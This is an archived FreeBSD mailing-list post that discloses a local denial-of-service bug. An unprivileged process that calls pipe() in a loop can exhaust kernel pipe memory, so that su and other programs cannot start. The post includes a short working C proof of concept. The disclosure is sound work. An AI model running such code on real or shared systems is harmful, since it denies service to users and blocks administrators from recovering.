From owner-freebsd-hackers@FreeBSD.ORG Mon Apr 7 11:02:43 2014 Return-Path: Delivered-To: freebsd-hackers@freebsd.org Received: from mx1.freebsd.org (mx1.freebsd.org [IPv6:2001:1900:2254:206a::19:1]) (using TLSv1 with cipher ADH-AES256-SHA (256/256 bits)) (No client certificate requested) by hub.freebsd.org (Postfix) with ESMTPS id CDF856F6 for ; Mon, 7 Apr 2014 11:02:43 +0000 (UTC) Received: from plane.gmane.org (plane.gmane.org [80.91.229.3]) (using TLSv1 with cipher AES256-SHA (256/256 bits)) (Client did not present a certificate) by mx1.freebsd.org (Postfix) with ESMTPS id 86EFAB5D for ; Mon, 7 Apr 2014 11:02:42 +0000 (UTC) Received: from list by plane.gmane.org with local (Exim 4.69) (envelope-from ) id 1WX7K2-0007oa-5C for freebsd-hackers@freebsd.org; Mon, 07 Apr 2014 13:02:38 +0200 Received: from lara.cc.fer.hr ([161.53.72.113]) by main.gmane.org with esmtp (Gmexim 0.1 (Debian)) id 1AlnuQ-0007hv-00 for ; Mon, 07 Apr 2014 13:02:38 +0200 Received: from ivoras by lara.cc.fer.hr with local (Gmexim 0.1 (Debian)) id 1AlnuQ-0007hv-00 for ; Mon, 07 Apr 2014 13:02:38 +0200 X-Injected-Via-Gmane: http://gmane.org/ To: freebsd-hackers@freebsd.org From: Ivan Voras Subject: pipe() resource exhaustion Date: Mon, 07 Apr 2014 13:02:22 +0200 Lines: 80 Message-ID: Mime-Version: 1.0 Content-Type: multipart/signed; micalg=pgp-sha1; protocol="application/pgp-signature"; boundary="gdAfTcbhoeCtfwdLfcCKIHSlfWI7e9a1I" X-Complaints-To: usenet@ger.gmane.org X-Gmane-NNTP-Posting-Host: lara.cc.fer.hr User-Agent: Mozilla/5.0 (X11; FreeBSD amd64; rv:24.0) Gecko/20100101 Thunderbird/24.3.0 X-Enigmail-Version: 1.6 X-BeenThere: freebsd-hackers@freebsd.org X-Mailman-Version: 2.1.17 Precedence: list List-Id: Technical Discussions relating to FreeBSD List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Mon, 07 Apr 2014 11:02:43 -0000 This is an OpenPGP/MIME signed message (RFC 4880 and 3156) --gdAfTcbhoeCtfwdLfcCKIHSlfWI7e9a1I Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: quoted-printable Hello, Last time I mentioned this it didn't get any attention, so I'll try again. By accident (via a buggy synergy server process) I found that a simple userland process can exhaust kernel pipe memory (kern.ipc.pipekva sysctl) which as a consequence has that new processes which use pipe cannot be started, which includes "su", by which an administrator could kill such a process. The description is simple enough, I don't think a proof of concept is really needed, but here it is: step 1: run this as a normal, non-root user: #include #include #include #include #include #include int main() { int fd[2]; int is_error =3D 0; while (1) { if (pipe(fd) !=3D 0) { if (!is_error) { printf("%s\n", strerror(errno)); is_error =3D 1; } } } } step 2: try and fail to run "su" in another terminal: $ su Password: su: pipe: Cannot allocate memory I'm sure this has other implications as well :) The problem isn't present on all systems: on some it looks like the limit on fd's is reached faster than the limit on pipekva. Of 5 machines I tested, 3 running 9.x and 2 running 10.x, both machines running 10.x exhaust pipekva before fd's, while only one machine running 9.x did that. Neither machine had increased fd limits above the autotuned default= s. Anecdotally, a machine which was running 9.x didn't experience this problem with synergys, but it did when upgraded to 10.x with no change to sysctl configuration. --gdAfTcbhoeCtfwdLfcCKIHSlfWI7e9a1I Content-Type: application/pgp-signature; name="signature.asc" Content-Description: OpenPGP digital signature Content-Disposition: attachment; filename="signature.asc" -----BEGIN PGP SIGNATURE----- Version: GnuPG v2.0.22 (FreeBSD) Comment: Using GnuPG with Thunderbird - http://www.enigmail.net/ iKYEARECAGYFAlNChb9fFIAAAAAALgAoaXNzdWVyLWZwckBub3RhdGlvbnMub3Bl bnBncC5maWZ0aGhvcnNlbWFuLm5ldDYxNDE4MkQ3ODMwNDAwMDJFRUIzNDhFNUZE MDhENTA2M0RGRjFEMkMACgkQ/QjVBj3/HSwmBACfUp6EFuPaCZEs5TUNJshlu0g0 eSYAnj/TCZ0JYltGjs+L4aAfg0E44IVU =c5/P -----END PGP SIGNATURE----- --gdAfTcbhoeCtfwdLfcCKIHSlfWI7e9a1I--